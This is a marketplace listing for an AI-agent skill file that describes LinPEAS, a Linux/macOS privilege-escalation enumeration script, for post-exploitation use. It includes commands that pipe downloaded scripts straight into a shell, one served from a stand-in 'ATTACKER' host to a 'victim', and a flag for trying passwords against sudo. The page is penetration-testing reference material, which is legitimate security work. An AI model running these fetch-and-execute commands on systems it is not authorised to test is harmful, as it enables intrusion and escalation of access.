aeondave/linpeas
offensive-tools/privilege-escalation/linpeas/SKILL.md
LinPEAS: automated bash script enumerating Linux/macOS privilege escalation vectors including SUID binaries, writable paths, weak service configs, cron jobs, sudo rules, and kernel CVE indicators. Use post-exploitation as a low-privilege user on Linux or macOS to identify escalation paths.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill linpeasInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Mar 31, 2026, 9:19 PM55.2s1 file scanned
SKILL.md
- name:
- linpeas
- description:
- LinPEAS: automated bash script enumerating Linux/macOS privilege escalation vectors including SUID binaries, writable paths, weak service configs, cron jobs, sudo rules, and kernel CVE indicators. Use post-exploitation as a low-privilege user on Linux or macOS to identify escalation paths.
- license:
- MIT (PEASS-ng)
- compatibility:
- Linux / macOS / Unix. Pure bash — no root required to run.
- author:
- AeonDave
- version:
- 1.0
LinPEAS
Linux/macOS privilege escalation enumeration script.
Quick Start
# Download and run directly (victim with internet)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Host and deliver from attacker box
python3 -m http.server 8000 # attacker
curl http://ATTACKER:8000/linpeas.sh | sh # victim
# Save output for review
./linpeas.sh -a 2>&1 | tee linpeas.out
Key Flags
| Flag | Purpose |
|------|---------|
| -a | All checks (thorough) |
| -q | Quiet mode |
| -s | SuperFast — skip slow checks |
| -P <pass> | Try password against sudo prompts |
Finding Categories
| Section | What it finds | |---------|--------------| | System info | OS/kernel version, CVE indicators | | Users & groups | Sudo perms, passwd/shadow leaks | | Files | SUID binaries, world-writable root dirs | | Cron | World-writable cron scripts | | Network | Open local ports, hosts file | | Services | Weak permissions on service binaries |
Interpreting Output
- Red / yellow highlight = high-confidence escalation vector
- Check all
99% PE —lines first
Resources
| File | When to load |
|------|--------------|
| references/ | Manual exploitation of common findings |
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026